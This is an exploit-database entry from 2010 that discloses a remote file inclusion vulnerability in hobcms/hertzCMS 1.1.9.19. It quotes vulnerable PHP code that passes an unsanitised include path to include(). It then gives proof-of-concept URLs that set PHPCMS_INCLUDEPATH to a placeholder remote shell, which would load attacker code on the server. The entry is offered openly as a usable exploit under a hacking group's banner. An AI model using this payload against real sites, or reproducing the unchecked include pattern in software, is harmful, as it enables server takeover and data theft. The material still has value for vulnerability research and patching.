hobcms / hertzCMS 1.1.9.19 File include Vulnerability

2010-07-10T00:00:00
ID 1337DAY-ID-13271
Type zdt
Reporter eidelweiss
Modified 2010-07-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
hobcms / hertzCMS 1.1.9.19 File include Vulnerability
=====================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download: http://sourceforge.net/projects/hobcms/files
Author: eidelweiss
Nb: ADMIN or registerd user account

		For Some One: Happy Birthday Honey (20th) wish you all the best

-----------------------------------------------------------------

	-=[ C0de ]=-

set_time_limit(0);

$formdata = Array();



# Anpassen

$PHPCMS_INCLUDEPATH					= 'include/';

$DOCUMENT_ROOT 						= 'c:/apache/htdocs/developement';



# Nicht дndern!!!

$PHPCMS_INDEXER_SAVE_FILE_NAME 	= 'defaults_indexer.php';

include ($PHPCMS_INCLUDEPATH.'class.lib_indexer_universal_phpcms.php');

-----------------------------------------------------------------

	-=[ P0C ]=-

	http://127.0.0.1/parser/phpcms_shell_indexer.php?PHPCMS_INCLUDEPATH= [inj3ct0r shell]

		or

	http://127.0.0.1/path/phpcms_shell_indexer.php?PHPCMS_INCLUDEPATH= [inj3ct0r shell]

=========================| -=[ E0F ]=- |=========================



#  0day.today [2018-04-08]  #